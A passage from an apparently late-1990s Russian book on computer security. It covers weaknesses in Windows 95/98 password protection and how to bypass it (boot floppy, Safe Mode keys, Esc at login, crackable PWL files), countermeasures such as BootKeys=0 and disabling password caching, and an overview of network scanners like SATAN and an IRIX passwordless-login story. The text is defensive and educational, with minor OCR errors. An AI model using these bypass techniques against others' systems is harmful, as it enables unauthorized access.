3. Найдите пиктограмму, которая называется Пароли (Passwords), и дважды щелкните на ней. После двойного щелчка на пиктограмме Пароли (Passwords) Windows может отобразить диалоговое окно, в котором ним будет задан вопрос о том, хотите ли вы одновременно с этим изменить пароль экранной заставки Windows 95/98. Это окно появится только в том случае, если вы уже используете опцию экранной заставки. Суть вопроса в том, чтобы предоставить вам возможность использовать одинаковый пароль и для открытия сеанса работы с Windows 95/98, и для экранной заставки.

4. Щелкните на опции Сменить пароль Windows (Change Windows Passwords).

5. Введите новый пароль в поле Новый пароль (New Password) диалогового окна Изменение пароля Windows (Change Windows Passwords) (рис. 3.1). He обращайте внимания на поле Старый пароль (Old Password), оно должно остаться незаполненным. Однако если вы хотите изменить существующий пароль, то сначала введите его, а затем новый пароль. Операционная система Windows 95/98 внесет соответствующие изменения.

6. В поле Подтверждение пароля (Confirm New Password) введите пароль, указанный вами в пункте 5. Затем щелкните на кнопке ОК. Windows 95/98 выведет сообщение о том, что смена пароля прошла успешно.

 

Рис. 3.1. Диалоговое окно Изменение пароля Windows

7. Щелкните на кнопке ОК для закрытия диалогового окна Свойства: Пароли (Passwords Properties).

Почему парольная защита Windows 95/98 ненадежна

После того как была установлена парольная защита, каждый раз, когда включается компьютер, Windows 95/98 станет вежливо осведомляться о том, каковы ваши регистрационное имя и пароль. Продолжение нормальной работы с Windows 95/98 будет возможно только в том случае, если регистрационное имя и соответствующий ему пароль были введены без ошибок. Означает ли это, что система парольной защиты Windows 95/98 гарантирует: злоумышленник не сможет знакомиться с содержимым всех ваших файлов и запускать любые программы на вашем компьютере?

Отнюдь. Почему? Да по той простой причине, что в основе функционирования Windows 95/98 лежат принципы, которые были применены на практике при создании другой, более примитивной операционной системы корпорации Microsoft — DOS. Несмотря на то, что Windows 95/98 старается "упрятать" DOS как можно дальше, она по-прежнему использует эту безнадежно устаревшую операционную систему для обеспечения работоспособности старых программ, которые остались у пользователей, сменивших DOS на Windows 95/98. А ведь хорошо известно, что в DOS напрочь отсутствуют защитные механизмы, которые предотвращают несанкционированный доступ к файлам и программам компьютера, работающего под ее управлением. Ведь в сущности DOS и задумывалась-то именно для выполнения совершенно противоположной задачи — предоставить всем возможность обращаться к любым файлам. Как следствие, существует несколько способов обойти парольную защиту Windows 95/98, загружая на компьютере операционную систему DOS вместо Windows 95/98.

Как предотвратить несанкционированную загрузку системы

В ходе инсталляции операционной системы Windows 95/98 корпорация Microsoft настойчиво рекомендует ее пользователям сразу же создать так называемый загрузочный диск. В этой рекомендации есть свой резон: если возникнут какие-либо проблемы при переходе на Windows 95/98, вы сможете воспользоваться загрузочным диском, чтобы внести необходимые поправки.

Если вы не создали загрузочную дискету во время инсталляции операционной системы, вы можете сделать это в любой момент. Выберите опцию Установка и удаление программ (Add/Remove Programs) на Панели управления (Control Panel) Windows 95/98, а затем щелкните на переключателе Загрузочный диск (Startup Disk). После этого нажмите кнопку Создать диск (Create Disk) и вставьте гибкий диск в дисковод. Чтобы создать загрузочный диск Ж Windows 95/98, вам потребуется всего одна дискета.

Таким образом, для создания загрузочного диска не требуется каких-либо особенных познаний. Зато с его помощью можно без всяких хлопот обойти систему парольной защиты Windows 95/98. Эта система активируется только при загрузке Windows 95/98. При использовании же загрузочного диска происходит запуск не Windows 95/98, а ее подсистемы, функционально эквивалентной операционной системе DOS и не имеющей никаких средств обеспечения безопасной работы с компьютером (наподобие парольной защиты). Затем путем нехитрых манипуляций злоумышленник может не только установить собственный пароль для последующего открытия сеанса работы с Windows 95/98, но и сделать так, чтобы все остальные ее пользователи ничего не заметили и продолжали регистрироваться в Windows 95/98 посредством своих законных паролей.

Чтобы предотвратить несанкционированный доступ к компьютеру через загрузочный диск, необходимо применять дополнительные физические меры защиты (например, закрывать на замок дверь, ведущую в помещение, где находится компьютер), блокировать клавиатуру или кнопку включения питания компьютера при помощи ключа, использовать установки BIOS компьютера для предотвращения неконтролируемой загрузки операционной системы с гибкого диска, а также для задания пароля включения питания и изменения установок BIOS.

Подобные меры окажутся весьма действенными и в том случае, если злоумышленник захочет использовать возможность загрузки Windows 95/98 в режиме защиты от сбоев, который также называется защищенным режимом (Safe Mode). Этот режим представляет собой специальный способ работы с Windows 95/98, с помощью которого можно запустить эту операционную систему, невзирая на всякие "мелочи" вроде парольной защиты. Для этого после включения питания компьютера достаточно удерживать в нажатом положении клавишу <F5> компьютерной клавиатуры.

Помимо <F5>, на клавиатуре имеются две другие особо "опасные" клавиши — <Ctrl> и <F8>, нажимая которые в ходе первоначальной загрузки Windows 95/98, злоумышленник может вызвать на экран дисплея специальное меню. В нем в качестве одной из опций присутствует возможность вместо Windows 95/98 запустить операционную систему DOS. С помощью этого меню можно заставить Windows 95/98 грузиться в режиме защиты от сбоев. Присутствие обеих этих возможностей одинаково нежелательно с точки зрения обеспечения в Windows 95/98 надежной парольной защиты.

Поэтому использование <F5>, <F8> и <Ctrl> и других подобных им клавиш в ходе первоначальной загрузки следует запретить, заставив Windows 95/98 никак не реагировать на их нажатие. Для этого достаточно отредактировать системный файл MSDOS.SYS, располагающийся, как правило, в разделе жесткого диска, с которого грузится Windows 95/98. Открыв MSDOS.SYS при помощи обычного редактора, вы увидите текст примерно следующего содержания:

[Paths]
WinDir=C:\WINDOWS
WinBootDir=C:\WINDOWS
HostWinBootDrv=C
[Options]
BootGUI=l
;
;The following lines are required for compatibility with other programs.
;Do not remove them (MSDOS.SYS needs to be >1024 bytes).

;xxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxa ;xxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxb
;xxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxx c
;xxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxd ;xxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxx x e ;xxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxf ;xxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxg ;xxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxh ;xxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxi
; ххххххххххххххххххххххххххххххххххххххххххххххххххххххххххххххх j ; ххххххххххххххххххххххххххххххххххххххххххххххххххххххххххххххх k
;
ххххххххххххххххххххххххххххххххххххххххххххххххххххххххххххххх m
;
ххххххххххххххххххххххххххххххххххххххххххххххххххххххххххххххх o
; хххххххххххххххххххххххххххххххххххххххххххххххххххххххххххххххр xxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxq
;
ххххххххххххххххххххххххххххххххххххххххххххххххххххххххххххххх r
;
ххххххххххххххххххххххххххххххххххххххххххххххххххххххххххххххх s

Добавьте в раздел [Options] файла MSDOS.SYS одну из двух команд: BootKeys = 0 или BootDeiay= 0 . Обе эти команды позволяют дезактивировать работу клавиш <F5>, <F8> и <Ctrl> в ходе первоначальной загрузки. А чтобы слишком умный взломщик не смог незаметно убрать команду BootKeys = 0 или BootDeiay= 0 , предусмотрительно помещенную вами в файл MSDOS.SYS, следует защитить его при помощи антивирусного сканера, который своевременно предупредит вас обо всех попытках внести несанкционированные изменения в этот файл.

Как запретить кэширование паролей в Windows 95/98

Пользователи миллионов компьютеров, применяющих парольную защиту Windows 95/98, часто даже не подозревают о еще одной грозящей им опасности. Проблема связана с кэшированием паролей — методом, который был разработан корпорацией Microsoft для их хранения в Windows 95/98. Многие выбирают кэширование паролей, даже не догадываясь об этом, поскольку кэширование в Windows 95/98 разрешено по умолчанию. В этом случае пользовательский пароль помещается операционной системой в отдельный файл на магнитном диске. Например, если ваше имя — Вадим, и оно также является идентификатором для входа в систему, то ваш пароль будет сохранен в файле C:\WINDOWS\BAAHM.PWL.

При кэшировании пароль записывается в PWL-файл в зашифрованном виде. В корпорации Microsoft утверждают, что применяемый метод шифроваия является лучшим среди разрешенных правительством США для экспорта за пределы страны. Суть возражений оппонентов Microsoft состоит в том. if что реализация этого метода в Windows 95/98 далеко не безупречна, и в результате его стойкость совершенно не отвечает современным требованиям. А Программы, предназначенные для дешифрования парольных файлов, можно легко отыскать в глобальной сети Internet (например, по адресу http://www.c2.org/hacksoft/), что свидетельствует об уязвимости метола шифрования паролей в Windows 95/98.

Существует 2 пути решения этой проблемы. Во-первых, можно получить от Microsoft "заплату", которая позволяет использовать в Windows 95/98 более совершенный метод шифрования паролей. Такая "заплата" доступна пользователям глобальных компьютерных сетей, в которых присутствует корпорация Microsoft.

Во-вторых, кэширование паролей можно отключить. Правда, чтобы сделать это, придется немного повозиться. Для начала потребуется установить программу, которая называется Редактор системных правил (System Policy Editor). Эта программа входит в комплект Windows 95/98 Resource Kit (Набор ресурсов Windows 95/98), который включен в поставку Windows 95/98 на компакт-диске. Чтобы ее установить, надо выполнить следующее:

1. Используя пиктограмму Установка и удаление программ (Add/Remove Programs) в Панели управления (Control Panel), выберите вкладку Установка Windows (Windows Settings).

2. Нажмите на кнопку Установить с диска (Have Disk) и в появившемся диалоговом окне укажите каталог E:\ADMIN\APPTOOLS\POLED1T для Windows 95 или E:\TOOLS\RESKIT\NETADMIN\POLEDIT для Windows 98 (если ваш CD-ROM установлен как диск Е).

3. В диалоговом окне, появившемся после нажатия кнопки Установить с диска (Have Disk), выберите программу Редактор системных правил (System Policy Editor), а затем нажмите кнопку Установить (Install).

4. Нажмите кнопку ОК, чтобы закрыть диалоговое окно Установка и удаление программ (Add/Remove Programs).

После установки для запуска редактора системных правил следует сначала выбрать пункт Программы (Programs) меню Пуск (Start), затем Стандартные (Accessories), далее Служебные (System Tools) и наконец — Редактор системных правил (System Policy Editor). Немного погодя перед вами появится диалоговое окно этой программы.

Выполнив команду Создать (New File) меню Файл (File), вы увидите пиктограммы Стандартный компьютер (Default Computer) и Стандартный пользователь (Default User). Щелкнув дважды сначала на пиктограмме Стандартный компьютер (Default Computer), а затем — на кнопках Сеть (Network) и Пароли (Passwords), можно пометить галочкой строку Отключить кэширование паролей (Disable Password Cashing).

Затем внесенные изменения следует сохранить на диске в виде файла системных правил с расширением POL, назвав его по своему усмотрению. При следующем запуске Windows 95/98 файл системных правил загрузится автоматически и будет определять работу компьютера.

Соблюдайте осторожность: парольная защита ненадежна

Попробуйте набрать произвольную последовательность символов, когда Windows 95/98 предложит вам ввести свое регистрационное имя и соответствующий пароль. Вы думаете, эта операционная система гневно ответит вам: "Руки прочь от компьютера! Введенное вами имя нельзя использовать, т. к. оно не зарегистрировано"? Ничего подобного! Вместо этого она ласково скажет: "Да вы, батенька, никогда раньше этим именем не пользовались. А не желаете ли зарегистрироваться?"

Злоумышленник, конечно же, с радостью согласится, и Windows 95/98 будет в его полном распоряжении. Примерно то же самое получится, если в ответ на приглашение зарегистрироваться нажать на клавиатуре компьютера клавишу <ESC>.

Эти простые приемы должны убедить вас в полной бесполезности парольной защиты Windows 95/98 в деле обеспечения безопасной работы с компьютером. Если вас такое положение дел не устраивает, загрузите улучшенный вариант библиотеки программ, реализующий парольную защиту в Windows 95/98, с Internet-сервера корпорации Microsoft по адресу http://www.microsoft.com/windows/download/mspwlupd.exe. После запуска программы mspwlupd.exe надо будет ответить Да (Yes) на вопрос о том, желаете ли вы заменить библиотеку, реализующую работу с паролями в Windows 95/98. Соответствующее программное обеспечение установится автоматически и будет работать после перезагрузки операционной системы.

Далее, с использованием редактора системных правил, можно определить полномочия всех пользователей (т. е., что им позволено делать, а что нет). В результате каждый пользователь Windows 95/98 будет иметь свой собственный набор полномочий. При этом настоятельно рекомендуется строго ограничить права пользователей, не имеющих пароля.

Уместен вопрос: а зачем вообще в Windows 95/98 нужна такая ничтожная парольная защита? Тем, кто уже приготовился произнести гневную тираду в адрес корпорации Microsoft, лучше приберечь свой пыл для более подходящего случая, поскольку ею официально заявлено, что основное назначение паролей Windows 95/98 состоит в предоставляемой ими возможности по-разному настраивать один и тот же компьютер для различных пользователей. А посему тем, кому нужна полноценная парольная защита, следует посоветовать обратиться к другой операционной системе семейства Windows (Windows NT) или воспользоваться дополнительными программными средствами, специально предназначенными для безопасной работы с Windows 95/98 (например, пакетом программ Norton Your Eyes Only компании Symatec). Что же касается новейшей операционной системы Windows 2000, то хотя и дополнение ко всему лучшему, что имелось в предыдущих версиях операционных систем семейства Windows, в ней должно было быть реализовано множество совершенно новых возможностей и технологий, способных повысить эффективность работы практически любого пользователя, делать какие-либо определенные выводы относительно подсистемы безопасности Windows 2000 пока еще преждевременно.

Конечно, чисто теоретически использование протокола Kerberos позволяет существенно улучшить механизм аутентификации в Windows 2000 даже по сравнению с Windows NT, не говоря уже о Windows 95/98. Однако вопрос о том, насколько хорошей будет практическая реализация этого протокола, остается открытым вплоть до официального выхода в свет финальной версии Windows 2000. Дело в том, что бета-версии операционных систем, как правило, не обладают функциональной полнотой их финальных версий, а также часто содержат ошибки, большинство которых исправляется к моменту выпуска финальных версий. Поэтому бета-версии программных продуктов могут служить лишь подсобным материалом для сугубо предварительного тестирования. "Сенсационная" информация в прессе о том, что пользователи могут регистрироваться в третьей по счету бета-версии Windows 2000 без ввода пароля, отнюдь не означает, что то же самое можно будет проделывать в ее финальной версии, которая, как планируется, должна поступить в продажу 17 февраля 2000 г. И целенаправленный поиск дыр в подсистеме безопасности операционной системы Windows 2000 лучше всею отложить до момента выхода ее финальной версии.

 

Глава 4. Безопасность компьютерной сети

Глава 4. Безопасность компьютерной сети

1. Сканеры

 

Сканеры

Когда-то давным-давно жесткие диски персональных компьютеров были объемом всего-навсего 10 Мбайт, а их оперативная память не превышала 640 Кбайт. Модемы работали на скоростях от 300 до 1200 бит/с, и мало кто из пользователей "персоналок" слышал о глобальной компьютерной сети Internet. Конечно, эта сеть существовала уже тогда, но использовалась исключительно в военных целях, а работа с ней осуществлялась только при помощи командной строки. Но не это служило основным препятствием для массового доступа к сети Internet. Вычислительные машины, которые могли быть задействованы в качестве серверов, были очень дорогими — их стоимость исчислялась цифрами с пятью-шестью нулями (в долларах). Да и сами персональные компьютеры стоили тогда весьма недешево, и были по карману только обеспеченным людям.

Итак, представим себе пригородный район, в котором проживают люди с достатком. Солидные дома с просторными гаражами и аккуратно подстриженными газонами. Близится полночь. На улицах пустынно, в окнах темно. И только одно окно ярко светится в темноте. Там, за персональным компьютером сидит юноша лет 15—17 и обзванивает при помощи модема телефонные номера, которые ему сообщил приятель. В большинстве случаев на другом конце провода оказывается другой модем, и на экране персонального компьютера появляется приглашение зарегистрироваться, т. е. ввести имя и пароль. Каждый раз, получив такое регистрационное приглашение. юноша начинает лихорадочно перебирать различные пары имен и соответствующих им паролей. Наконец, одна пара подходит, и юный взломщик получает возможность управлять удаленным компьютером, сидя дома.

Сейчас уже трудно поверить, что первым компьютерным взломщикам приходилось так напрягаться. Ведь известно, что они очень не любят выполнять рутинную работу и при всяком удобном случае стараются заставить свои компьютеры заниматься такой работой. Поэтому неудивительно, что компьютерные взломщики вскоре создали специальное программное средство, чтобы не набирать вручную дюжину команд. Это программное средство назвали боевым номеронабирателем.

Боевой номеронабиратель представляет собой программу, обзванивающею заданные пользователем телефонные номера в поисках компьютеров, которые в ответ на поступивший звонок выдают регистрационное приглашение Программа аккуратно сохраняет в файле на жестком диске все такие телефонные номера вместе с данными о скорости соединения с ними. Одним и ; самых известных и совершенных боевых номеронабирателей является TONELOC, предназначенный для работы в среде операционной системы DOS (он может быть запущен под управлением Windows 95/98 в режиме командной строки).

Дальнейшее совершенствование боевых номеронабирателей привело к созданию сканеров. Первые сканеры были весьма примитивными и отличались от боевых номеронабирателей только тем, что специализировались исключительно на выявлении компьютеров, подключенных к сети Internet пли к другим сетям, использующим протокол TCP/IP. Они были написаны на языке сценариев программной оболочки операционной системы UNIX. Такие сканеры пытались подсоединиться к удаленной хост-машине через различные порты TCP/IP, отправляя всю информацию, которая выводилась на устройство стандартного вывода этой хост-машины, на экран монитора того компьютера, где был запущен сканер.

Ныне сканеры стали весьма грозным оружием как нападения, так и защиты в Internet. Что же представляет собой современный сканер?

 

2. Сканер в вопросах и ответах

Сканер в вопросах и ответах

Что такое сканер?

Сканер — это программа, предназначенная для автоматизации процесса поиска слабостей в защите компьютеров, подключенных к сети в соответствии с протоколом TCP/IP. Наиболее совершенные сканеры обращаются к портам TCP/IP удаленного компьютера и в деталях протоколируют отклик, который они получают от этого компьютера. Запустив сканер на своем компьютере, пользователь, скажем, из подмосковной Малаховки, лаже не выходя из дома, может найти бреши в защитных механизмах сервера, расположенного, например, в Лос-Анджелесе.

Каковы системные требования для работы со сканерами?

Большинство сканеров предназначено для работы в среде операционном системы UNIX, хотя к настоящему времени такие программы имеются практически для любой операционной системы. Возможность запустить сканер на конкретном компьютере зависит от операционной системы, под управлением которой работает этот компьютер, и от параметров подключения к Internet. Есть сканеры, которые функционируют только в среде UNIX, а с остальными операционными системами оказываются несовместимыми. Другие отказываются нормально работать на устаревших компьютерах с Windows 3.11 и с медленным (до 14 400 бит/с) доступом к Internet, осуществляемым по коммутируемым линиям. Такие компьютеры будут надоедать сообщениями о переполнении стека, нарушении прав доступа или станут просто зависать.

Критичным является и объем оперативной памяти компьютера. Сканеры. которые управляются при помощи командной строки, как правило, более умеренны в своих требованиях, предъявляемых к объему оперативной памяти. А самыми "прожорливыми" являются сканеры, снабженные оконным графическим интерфейсом пользователя.

Трудно ли создать сканер?

Написать сканер не очень трудно. Для этого достаточно хорошо знать протоколы TCP/IP, уметь программировать на С или Perl и на языке сценариев, а также разбираться в программном обеспечении сокетов. Но и в этом случае не следует ожидать, что созданный вами сканер принесет большую прибыль, поскольку в настоящее время предложение на рынке сканеров значительно превышает спрос на них. Поэтому наибольшая отдача от усилий, вложенных в написание сканера, будет скорее моральной (от осознания хорошо выполненной работы), чем материальной.

Что не по силам даже самому совершенному сканеру?

Не следует переоценивать положительные результаты, которых можно достичь благодаря использованию сканера. Действительно, сканер может помочь выявить дыры в защите хост-машины, однако в большинстве случаев информацию о наличии этих дыр сканер выдает в довольно завуалированном виде, и ее надо еще уметь правильно интерпретировать. Сканеры редко снабжаются достаточно полными руководствами пользователя. Кроме того. сканеры не в состоянии сгенерировать пошаговый сценарий взлома исследуемой компьютерной системы. Поэтому для эффективного использования сканеров на практике прежде всего необходимо научиться правильно интерпретировать собранные с их помощью данные, а это возможно только при наличии глубоких знаний в области сетевой безопасности и богатого опыта.

Насколько легальны сканеры?

Обычно сканеры создаются и используются специалистами в области сетевой безопасности. Как правило, они распространяются через сеть Internet. чтобы с их помощью системные администраторы могли проверять компьютерные сети на предмет наличия в них изъянов. Поэтому обладание сканерами, равно как и их использование на практике, вполне законно. Однако рядовые пользователи, не являющиеся системными администраторами. должны быть готовы к тому, что, если они будут применять сканеры для обследования чужих сетей, то могут встретить яростное сопротивление со стороны администраторов этих сетей. Более того, некоторые сканеры в процессе поиска брешей в защите компьютерных сетей предпринимают такие действия, которые по закону могут квалифицироваться как несанкционированный доступ к компьютерной информации, или как создание, использование и распространение вредоносных программ, или как нарушение правил эксплуатации компьютеров, компьютерных систем и сетей. И если следствием этих деяний стало уничтожение, блокирование, модификация или копирование информации, хранящейся в электронном виде, то виновные в них лица в соответствии с российским законодательством подлежат уголовному преследованию. А значит, прежде чем начать пользоваться первым попавшимся под руку бесплатным сканером для UNIX-платформ, стоит убедиться, а не копирует ли случайно этот сканер заодно и какие-нибудь файлы с диска тестируемой им хост-машины (например, файл password из каталога /ETC).

В чем различие между сканерами и сетевыми утилитами?

Часто к сканерам ошибочно относят утилиты типа host, rusers, finger. Traceroute, Showmount. Связано это с тем, что, как и сканеры, данные утилиты позволяют собирать полезную статистическую информацию о сетевых службах на удаленном компьютере. Эту информацию можно затем проанализировать на предмет выявления ошибок в их конфигурации.

Действительно, сетевые утилиты выполняют ряд функций, которые характерны для сканеров. Однако в отличие от последних использование этих утилит вызывает меньше подозрений у системных администраторов. Выполнение большинства сетевых утилит на удаленной хост-машине практически не оказывает никакого влияния на ее функционирование. Сканеры же зачастую ведут себя как слон в посудной лавке и оставляют следы, которые трудно не заметить. Кроме того, хороший сканер — явление довольно редкое, а сетевые утилиты всегда под рукой. К недостаткам сетевых утилит можно отнести то, что приходится выполнять вручную слишком большую работу, чтобы добиться того же результата, который при помощи сканера получается автоматически.

Упомянутые выше сетевые утилиты можно встретить в любой операционной системе семейства UNIX. Однако предоставляемые ими возможности для сбора данных об удаленной хост-машине интересуют не только пользователей UNIX. Поэтому неудивительно, что многие из jthx утилит были перенесены в другие операционные системы.

Для Windows 95/98 имеются программные пакеты NetScan Tools (http://www.eskimo.com/~nwps/index.html). Network Toolbox (http://www.jriver. com/netbox.html) и TCP/IP Surveyor (http://www.rocketdownload.com/details/

inte/wssrv32nsrc.htm), которые реализуют выполнение сетевых утилит host, rusers, finger, Traceroute, ping, WHOIS. Последний из упомянутых пакетов не только осуществляет сбор информации о сети и подключенных к ней компьютерах, но и представляет собранную таким образом информацию в виде графа, вершинами которого служат найденные в сети маршрутизаторы, серверы и рабочие станции.

Пользователям персональных компьютеров типа Macintosh можно посоветовать обратить внимание на программные пакеты МасТСР Watcher (http://waldo.wi.mit.edu/WWW/tools/util/Mac/MacTCP_Watchei), Querylt! (http://tucows.online.ru/mac/adnload/dlqueryitinac.html) и What Route (http://homepages.ihug.co.nz/~bryanc).

3. Сканер в действии

Сканер в действии

Сканеры безусловно способствуют повышению уровня сетевой безопасности. Их с полным правом можно назвать санитарами компьютерных сетей. При этом не так уж и важно, в чьих руках находятся сканеры: хакеров или взломщиков. Если эти средства анализа защищенности сетей используются системным администратором, то положительный эффект от их применения не вызывает сомнений. Случай, когда взломщик применяет сканер для преодоления защитных механизмов компьютерной сети, рано или поздно будет выявлен, проанализирован, а в защитные механизмы сети внесены необходимые поправки, чтобы исключить повторный взлом.

Глупо думать, что сканеры вслепую рыщут по сети, отыскивая возможную мишень для взлома. Отнюдь нет. Все сканеры создаются в расчете на уже найденные дыры в защите хост-машин конкретного типа. Им остается только обнаружить хост-машину этого типа и проверить, действительно ли она сконфигурирована таким образом, что известная дыра все еще не "залатана". Для иллюстрации того, как можно использовать сканер, рассмотрим следующий пример.

В конце 1995 г. американская корпорация Silicon Graphics Incorporated (SGI) начала массовое производство мощных компьютеров серии WebForce. Для них имелось специальное программное обеспечение, предназначенное для создания Web-страниц, насыщенных мультимедийными приложениями. Эти компьютеры работали под управлением операционной системы IRIX (разновидность UNIX).

Вскоре в Internet разнесся слух о том, что некоторые версии IRIX имеют дефект, который позволяет удаленному пользователю регистрироваться в ней под именем 1р, при этом пароля вводить не нужно. В результате компьютерный взломщик, беспрепятственно вошедший в IRIX под именем 1р, обладал достаточными привилегиями, чтобы скопировать файл password, содержащий зашифрованные имена и пароли пользователей, с компьютера серии WebForce на свой компьютер. Дальше взломщик мог в спокойной обстановке попытаться дешифровать скопированный им файл, чтобы получить полный список имен и паролей пользователей компьютера SGI.

Итак, дыра в защите компьютеров серии WebForce была обнаружена. Оставалось только отыскать эти компьютеры в Internet. Поскольку их системные администраторы лучше разбирались в компьютерной графике и почти ничего не смыслили в вопросах сетевой безопасности, то некоторые каталоги на дисках вверенных их заботам компьютеров были доступны для всеобщего обозрения через Internet. В одном из этих каталогов содержался стандартный файл password из дистрибутива операционной системы IRIX. Большинство перечисленных в нем регистрационных имен пользователей были характерны для любой другой операционной системы семейства UNIX. Однако имелись среди них и имена, которые являлись уникальными именно для IRIX. Таким образом, пользуясь любой поисковой машиной сети Internet, можно было задать в качестве искомой информации ли имена и получить готовый список компьютеров серии WebForce.

Тем не менее, данный метод оказался не очень надежным, поскольку через несколько месяцев системные администраторы компьютеров серии WebForce спохватились и убрали файл password из общедоступных каталогов. Кроме того, не все версии операционной системы IRIX имели рассмотренный дефект. По этой причине взломщики решили прибегнуть к помощи , сканера. Был написан сканер, который случайным образом или на основе .каких-то дополнительных сведений выбирал некоторые сетевые адреса. Результаты обращения по этим адресам фиксировались в специальном текстовом файле. Его потом можно было проверить на наличие в нем строк типа:

Trying 199.200.0.1

Connecting to 199.200.0.1

Escape character is "]"

IRIX 4.1

Welcome to Graphics Town!

Login:

Некоторые взломщики автоматизировали этот процесс, заставив сканер регистрироваться в качестве 1р на удаленном компьютере. Если регистрация проходила успешно, то информация об этом факте заносилась в файл вместе с указанием адреса найденного компьютера.

4. SATAN, Jackal и другие сканеры

Среди сканеров наибольшую известность получил SATAN (Security Administrator's Tool for Analyzing Networks). Этот сканер распространяется через 'Internet (его можно найти, например, по адресу http://www.fish.com), начиная с апреля 1995 г.

Ни одно средство анализа сетевой безопасности не вызывало столько споров, сколько пришлось на долю сканера SATAN. Газеты и журналы отреагировали на его появление пространными статьями, в которых изображали SATAN чуть ли не сатанинским изобретением. В телевизионных выпусках новостей звучали грозные предупреждения об опасности, которую для всех пользователей сетей представлял этот сканер.

И действительно, SATAN был довольно необычным для своего времени программным пакетом. Предназначенный для использования на рабочих станциях, работающих под управлением операционной системы UNIX, он обладает дружественным пользовательским интерфейсом. В нем имеются готовые формуляры, в которые пользователю остается только внести минимальные сведения об анализируемом сетевом объекте, а также таблицы, которые автоматически заполняются по мере накопления информации. При нахождении какого-либо изъяна в сетевой защите пользователю предлагается воспользоваться контекстно-зависимой справкой, чтобы лучше понять суть обнаруженного изъяна.

Под стать своему необычному детищу были и сами авторы SATAN — американцы Д. Фармер (D. Farmer) и У. Венема (W. Venema) — талантливые программисты, хакеры и авторитетные специалисты в области сетевой безопасности.

SATAN предназначен исключительно для работы в среде UNIX. Для его установки и запуска необходимы права администратора. Основная задача SATAN, как это следует из его названия, состоит в том, чтобы отыскивать изъяны в защитных механизмах компьютерной сети, в которой используется протокол TCP/IP. Следует особо подчеркнуть, что речь идет об уже известных изъянах. Это означает, что SATAN не делает ничего такого, что не по силам совершить опытному компьютерному взломщику, который вручную пытается преодолеть сетевую защиту.

Еще одной отличительной особенностью SATAN является его повышенная требовательность к системным ресурсам, особенно к производительности центрального процессора и объему оперативной памяти. Поэтому тем пользователям, которые хотят воспользоваться сканером SATAN, но имеют компьютеры с ограниченными ресурсами, можно посоветовать их увеличить. Если это по каким-либо причинам не реализуемо, следует попытаться избавиться от выполнения лишних процессов и работать с SATAN с помощью командной строки.

Сканер Strobe (Super Optimized TCP Port Surveyor) исследует порты TCP/IP выбранного компьютера и протоколирует все полученные сведения. Основное достоинство Strobe — быстрота сканирования. Если компьютер, на котором запущен Strobe, подключен к Internet через модем, работающий со скоростью 28800 бит/с, то на полное сканирование сервера ему понадобится всего около 30 с. Однако полученная информация будет довольно скудной — лишь общие диагностические сведения о сетевых службах сервера. Кроме того, в хост-машине, подвергшейся сканированию с помощью Strobe, этот факт не останется не замеченным (скорее всего, он будет зафиксирован в файле /var/adm/messages). Сканер Strobe можно скачать из Internet по адресу

Jackal (доступен в Internet по адресу http://www.giga.or.at/pub/hacker/unix) — это сканер-"призрак". Он анализирует сетевые домены, проникая сквозь брандмауэры и не оставляя при этом никаких следов своего проникновения

Сканер NSS (Network Security Scanner) замечателен прежде всего тем, что написан на языке Perl и, следовательно, может быть легко перенесен на любую платформу, для которой имеется интерпретатор этого языка. Другим достоинством NSS является скорость его работы. Желающие познакомиться с NSS поближе также могут обратиться в Internet по адрес\

Более узкая специализация характерна для IdentTCPscan (предназначен для определения регистрационного имени пользователя, работающего с данным портом TCP/IP), FSPScan (осуществляет поиск серверов, которые поддерживают сетевой протокол FSP), XSCAN (анализирует Х-серверы с целью нахождения изъянов в их конфигурации) и CONNECT (ищет серверы, работающие с протоколом TFTP). Все эти сканеры можно найти там же, где и Jackal с NSS.

Исторически сложилось, что подавляющее большинство сканеров было создано для операционной системы UNIX. Поэтому довольно трудно отыскать предназначенные для других платформ сканеры, которые по своей мощи, удобству использования и богатству возможностей могли бы сравниться с SATAN. Кроме того, многие отличные от UNIX платформы, поддерживающие протокол TCP/IP, реализуют его в неполном объеме.

Пользователям Windows 95/98, которые непременно хотят поскорее попробовать свои силы в поиске изъянов сетевой защиты, можно посоветовать применить сканер, который входит в упоминавшийся выше программный пакет Network Toolbox.

Следует отметить, что в средствах защиты сетей от взлома постоянно обнаруживаются новые изъяны. Соответственно претерпевают изменения и сканеры. Внесение в них поправок — дело не особенно трудоемкое: достаточно Дописать исходный код сканера с учетом недавно найденных брешей в сетевых защитных механизмах, и новая, более совершенная, версия сканера готова! Вот почему сканеры продолжают оставаться одним из самых главных средств защиты сетей. Системным администраторам необходимо иметь в распоряжении как можно больше таких средств — хороших и разных.

5. Анализаторы протоколов

 

настоящее время технология построения компьютерных сетей Ethernet стала самым распространенным решением. Сети Ethernet завоевали огромную популярность благодаря хорошей пропускной способности, простоте установки и приемлемой стоимости сетевого оборудования. Участки сетей для которых скорости передачи данных 10 Мбит/с недостаточно, можно довольно легко модернизировать, чтобы повысить эту скорость до 100 Мбит/с (Fast Ethernet) или даже до 1 Гбит/с (Gigabit Ethernet).

Однако технология Ethernet не лишена существенных недостатков. Основной из них — передаваемая информация не защищена. Компьютеры, подключенные к сети Ethernet, оказываются в состоянии перехватывать информацию, адресованную своим соседям. Основной причиной тому является принятый в сетях Ethernet так называемый широковещательный механизм обмена сообщениями.

Локальное широковещание

